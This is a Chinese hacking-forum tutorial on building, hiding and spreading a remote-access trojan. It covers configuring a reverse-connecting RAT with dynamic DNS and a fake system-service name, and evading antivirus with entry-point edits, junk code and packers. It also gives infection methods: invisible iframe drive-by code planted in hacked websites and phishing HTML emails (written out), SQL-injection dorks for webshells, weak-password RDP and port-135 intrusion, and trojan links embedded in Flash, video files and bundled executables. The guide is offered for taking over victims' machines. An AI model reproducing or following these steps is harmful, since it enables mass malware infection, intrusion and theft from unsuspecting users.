远程控制全攻略
[size=3][color=darkslategray]这篇文章中,我将介绍远控的使用和免杀,还有传播办法。希望小菜们喜欢。
一,配置服务端
现在的远控主要是反弹连接,对于我们用ADSL上网的人来说,每次上线IP就会变,所以我们就要申请个动态域名(DNS),这样不管我们在哪,都可以控制肉鸡了。
现在我们就来申请动态域名吧!我们可以去[/color][/size][size=3][color=darkslategray]http://www.3322.org[/color][/size][size=3][color=darkslategray]去申请注册,注册是非常简单的。比如我注册的是http:seanken.3322.org,注册完毕之后,我们得下载它的服务端,方便我们更新IP用。(如图1)做完这些准备,我们就来开始打造我们的小马吧!
打开上兴2007v4.4,我们点击配置服务端,会出现如图2的界面,DNS域名解析就是我们刚才申请的动态域名,添的格式是“你的域名:端口”建议添高点的端口,防止端口被占,肉鸡上不了线。关于其他的配置填写,都有说明。还有,不要点那个UPX加壳,这样会方便我们做免杀的。关于服务名称,我们必须伪造的像系统服务,不然有手杀经验的人会发现的。(所以也不建议插入IE,但可以插入SVCHOST或EXPLORER)我们的马儿已经制作完成了,下面就来说说免杀吧!
二,免杀
以前看文章,高手们都是用CCL等定位特征码,然后再将其修改,或手动加花。其实我们打可以不必这样。(小菜:你比我还采啊!)免杀可以简单的分为以下3步:
1,入口点+1,用到的工具PEDITOR。比如原来的入口点是0009B064,加1之后就是0009B065。然后点击应用更改。如图3
2,加花,可以去一些黑客大站去下载加花的工具。这里我们用超级加花器,直接把你要免杀的木马直接拽到那个文件的地方,如图4。
3,加壳,加壳是最重要的,它不仅可以保证我们的马体积小,还可以使我们的马活的更长。所以我们应该找一些生僻的壳,或一些牛人做的变种壳。这里我们用PE-加密个人版,如图5。
三,传播
木马的传播有N种方法,我就把我知道的给总结出来吧!各位不要见笑。
1,利用挂马传播。
当我们入侵网站,拿到WEBSHELL之后,可以在它的首页,找个隐蔽的位置插入<iframe src="地址" width=0 height=0></iframe>,现在流行的马是MS06014+ANI。因此我们必须找个免费空间放我们的马和网页。(去BAIDU搜吧!)
这里我建议一下小菜们,最好用下载着,找那些生成后没有免杀过的,然后自己免杀,就像上文所说的。(小菜A:为什么用下载者?小菜B:你笨啊,当你浏览网页时,半天都打不开,你是不是得把它关了啊!)注:下载者一般只有2-5KB大小。
有的小菜会问,如何拿WEBSHELL。这个可以利用GOOGLEHACKING。在GOOGLE搜索中,输入:"inurl:asp?id="(asp可以换成JSP或ASPX,还有在个人设置里把每页的显示数量改成100)然后把GOOGLE返回的搜索地址复制到啊D中,如图4。发现有注入点的话,就去检测,如果密码是16位或32位的,有可能用MD5加密了,可以去XMD5.ORG破解密码。然后去找后台,进入后台的话,找上传,再用数据库备份。没有数据库备份的可以用抓包,然后NC提交拿SHELL。(本文不谈如何入侵网站,所以不明白的可以去找相关的文章去看)
2,漏洞入侵
A,现在有很多的用户是用GHOST系统,存在弱口令new,并且开放3389。所以我们可以用扫描软件去扫开放3389的主机,然后用那个若口令登陆,登陆之后如果他是挂机,那么我们就可以给他传木马了。(传刚才的下载者,体积小)有两种方法:
a,利用IE。在地址栏里输入你的木马地址,然后下载运行。
b,可以利用MS给我们的便利。打开远程桌面连接,点选项,再点本地资源,把磁盘驱动器选上,这样我们就可以用复制粘贴来传木马了。
B,我们还可以用NTSCAN扫描开放135,并且存在弱口令的机子。如图5。然后再用RECTON去连接。如图6。连接成功,我们可以利用它给我们的功能传木马了。(很简单的)
C,MS06040
关于MS06040我不推荐用,因为他很鸡肋的。只能用于WIN2000和WINXPSP1溢出。现在的机子差不多都是WINXPSP2的,WIN2000很少(除了网吧,服务器之类的)。所以本人不推荐用。
3,邮件传播。
跟挂马差不多,但是比他简单。
在写邮件的时候一定要选择“html编辑模式”,然后在内容里面写这样一段代码,
<body>
<p>免费打电话的软件(测试版)</p>
<p><a href="[/color][/size][size=3][color=darkslategray]http://XHONKER.cn[/color][/size][size=3][color=darkslategray]">点击下载 </a></p>
</body>
</html>
<iframe src="网马地址" width="0" height="0"></iframe>
其他的信息可以随便写,最好有迷惑性的。然后把你的邮件大量大发出去吧!(有些文章编辑系统支持HTML,所以我们可以在里面插入<iframe src="网马地址" width="0" height="0"></iframe>。)[/color][/size]
[size=3][color=darkslategray]四,以下的方法是从网上找的:
1,利用Flash传播
首先打开Flash MX,然后新建,在侦里面选择1,然后右键侦创建一个空白关键侦,在下面的空白处随便写上或者画上什么。然后选择下面的“动作”,这时我们会看见一个“浏览器”的选项,双击一下“geturl”,在右边的地址里面写上你的网页木马的地址,注意一定要加上“http://”,例如:[/color][/size][size=3][color=darkslategray]http://baidu.com[/color][/size][size=3][color=darkslategray]我们还需要为它定义一个变量,就是停止的变量,点左边的动作,选择“影片控制”,然后会看见一个“stop”的选项,双击一下然后点最上面的文件,选择导出,文件名可以随意。
四 利用视频传播
首先我们准备一段视频,大家注意需要是rm格式或者rmvb格式,要是不这种格式是不能能成功的。我们进入RealMedia Editor的安装目录,然后点击rmedtgui,便打开了软件主程序。这时,选择我们要修改的视频文件,再选择“工具”,选择“合并事件”。这个事件要事先写好,新建一个文本,在里面写 u 00:5.0 00:8.0 [/color][/size][size=3][color=darkslategray]http://baidu.com[/color][/size][size=3][color=darkslategray],意思说,这个是一个url事件,在第5秒到第8秒的时候打开后面的网站。好了,我们选择这个事件,它就会生成,生成之后然后我们另存为一下
讲完了rm格式的,我们再讲讲wma,wmv,asf的格式是如何实现的。首先我们打开Windows Media Editor,然后选择文件,然后点击下面的“脚本命令”,然后添加,这时就比较简单了,大家需要了解一下,添加类型选择URL,时间 00:00:00:0 代表的是 时,分,秒,后门的地址就是网页木马的地址,例如[/color][/size][size=3][color=darkslategray]http://baidu.com[/color][/size][size=3][color=darkslategray]然后点击确定,点击“文件”,在选择“另存并索引”。
2,利用捆绑传播
很多的时候我们打开一个软件却无缘无故的弹出另外的的一个程序,其实这里就是使用了软件捆绑技术。网络上的捆绑器有很多,在这里我推荐一款,叫作“黑鹰基地免杀捆绑器”。首先我们选择第一个文件可以是任意的,然后选择第二个文件,这里就用我们的木马,目标文件就是我们需要生成的文件,可以随便写的。
3,利用exe广告注入传播
这是比较的简单一种方法,不过隐蔽性能还是很不错的。首先打开exe广告注入器,在网页里面填写你需要打开的网页木马地址,例如:[/color][/size][size=3][color=darkslategray]http://baidu.com[/color][/size][size=3][color=darkslategray],然后选择需要注入的文件和图标,在最下面选择一下“隐藏弹出IE窗口”,这样更好的隐蔽自己的网页木马,最后点击开始注入,这样当别人打开你的文件的时候就会隐蔽的打开你的网页木马了。
最后把这些生成的东西,利用共享或其他的途径传播出去,到时候就等着啃鸡腿吧![/color][/size]
[size=3][color=darkslategray][/color][/size]